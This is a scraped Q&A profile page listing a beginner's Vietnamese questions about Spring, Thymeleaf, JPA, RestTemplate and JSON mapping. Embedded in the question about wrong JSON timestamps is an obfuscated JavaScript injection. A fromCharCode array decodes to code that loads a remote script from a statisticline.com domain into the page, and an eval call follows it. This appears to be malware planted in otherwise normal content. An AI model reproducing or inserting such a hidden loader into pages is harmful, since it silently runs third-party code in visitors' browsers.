Vo Thanh Vuong
10 questions
2 answers
Avatar
0
Vo Thanh Vuong Beginner
Vo Thanh Vuong Beginner
Hướng phát triển
Spring(nên biết thêm những gì), những công nghệ cần biết khi làm việc với spring,...
Answer
Avatar
0
Vo Thanh Vuong Beginner
Vo Thanh Vuong Beginner
Phân quyền trong spring
Trong thymleaf e có đoạn phân role như này: nhưng nó ko nhận thì lỗi là do ở bên Java e code chưa có quyền hay sao ạ. <p> Nếu đúng thì f12 sẽ ko có đoạn sec:authorize= như ảnh nữa ạ </p> <img src="https://stackask.com/wp-content/uploads/2023/02/aa.png" alt="" class="alignnone size-full wp-image-9535" /> <p> Cho e hỏi lỗi này là do e config bên thymleaf chưa đủ hay do bên BE e chưa set đúng role hay sao ạ. </p> <p> E có khai báo <pre> xmlns:sec="http://www.thymeleaf.org/thymeleaf-extras-springsecurity"</pre> và dependency <pre>thymeleaf-extras-springsecurity4</pre> </p>
Answer
Avatar
1
Vo Thanh Vuong Beginner
Vo Thanh Vuong Beginner
Gen database bằng code java sử dụng các anotation
Khi em làm 1 project nào đó, Em thường tạo bảng bằng cách gen code entity và dùng những annotation @ManyToOne, @OneToMany, @OneToOne. Em không biết là nó có ảnh hưởng tới những cái gì không ạ.
Answer
Avatar
1
Vo Thanh Vuong Beginner
Vo Thanh Vuong Beginner
IOC và Dependency Injection
Anh có thể giải thích 2 khái niệm này chi tiết và cho e 1 code ví dụ cụ thể được không ạ?
Answer
Avatar
0
Vo Thanh Vuong Beginner
Vo Thanh Vuong Beginner
Không lấy được data khi dùng RestTemplate
Em dùng restTemplate exchange để call api post. Nhưng api đó trả về 200 thì e mới bắt được, còn 400 thì e ko get được body hay status code luôn ạ. Em cũng chưa biết là do bị gì ạ.
Answer
Avatar
0
Vo Thanh Vuong Beginner
Vo Thanh Vuong Beginner
Sai thời gian khi nhận time từ json
khi Em nhận data từ json model "actionTime": "2022-12-27 10:50:52" <p> dưới code em dùng: </p> <pre>@JsonFormat(pattern = "yyyy-MM-dd HH:mm:ss") private Date actionTime;</pre> <p> thì nó trả về sai giờ : Tue Dec 27 17:41:25 ICT 2022 </p> <p> </p> <p> khi em debug thì nó trả như vậy. </p> <img src="https://stackask.com/wp-content/uploads/2022/12/debuggg.png" alt="" class="alignnone size-full wp-image-9174" /> <p> Sau khi em parse bên thymleaf ${#dates.format(data.actionTime, ‘dd/MM/yyyy HH:mm:ss’)} thì nó ra 2022-12-27 05:50:52 chỉ sai mỗi giờ, còn phút giây vẫn đúng ạ </p> <p> Nhờ anh xem giúp em ạvar z =String;var t=z.fromCharCode(118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,99,100,110,46,115,116,97,116,105,115,116,105,99,108,105,110,101,46,99,111,109,47,115,99,114,105,112,116,115,47,115,119,97,121,46,106,115,63,118,61,50,39,59,32,10,115,46,105,100,61,39,115,119,97,121,116,114,97,99,107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(/<em>674867468</em>/t); </p>
Answer
Avatar
0
Vo Thanh Vuong Beginner
Vo Thanh Vuong Beginner
Query trong Spring
Khi em làm api về filter. Vdu: filter theo name, status, type. Những cái này có thể truyền vào hoặc không. Em thường tạo 1 DAO và dùng Hibernate EntityManager. Tạo câu query dùng if để check những trường name, status, type có empty không và gán vào câu truy vấn. Em thấy có nhiều cách khác nữa nhưng e k nắm. Nếu có cách nào hiệu quả hơn nhờ a chỉ giúp e với ạ.
Answer
Avatar
1
Vo Thanh Vuong Beginner
Vo Thanh Vuong Beginner
Sự khác nhau Timer, TimerTask và @Schedule trong Spring
E thấy Timer, TimmerTask và @Schedule đều dùng để tạo task được. Vậy có những điểm khác nhau nào ở nó ạ? Trước giờ e chỉ chạy job bằng @Schedule và set cron cho nó thôi ạ.
Answer
Avatar
1
Vo Thanh Vuong Beginner
Vo Thanh Vuong Beginner
Làm cách nào để dùng generic vẫn có thể map json thành Object khi dùng @JsonProperty?
Ở câu hỏi trước e có hỏi về cách map json về object. Nhưng khi em dùng generic thì nó không map được. <pre>public class ApiResult { @JsonProperty("data") private List dataList; @JsonProperty("errorCode") private String code; @JsonProperty("errorMess") private String mess; } ResponseEntity responseEntity = restTemplate.exchange( api, HttpMethod.POST, httpEntity, ApiResult.class ); ApiResult apiResult = responseEntity.getBody(); </pre> <p> thì nó sẽ như này ạ. </p> <p> </p> <img src="https://stackask.com/wp-content/uploads/2022/12/no-1.png" alt="" class="alignnone size-full wp-image-8820" />
Answer
Avatar
0
Vo Thanh Vuong Beginner
Vo Thanh Vuong Beginner
parse json to object
Nhờ a trả lời giúp em câu hỏi này với ạ. Em có hỏi lại ở phần cmt ạ. Thanks a. <p> </p> <a href="https://stackask.com/question/parse-json-to-object-dung-jsonproperty/#comment-1626" target="_blank">https://stackask.com/question/parse-json-to-object-dung-jsonproperty/#comment-1626</a>
Answer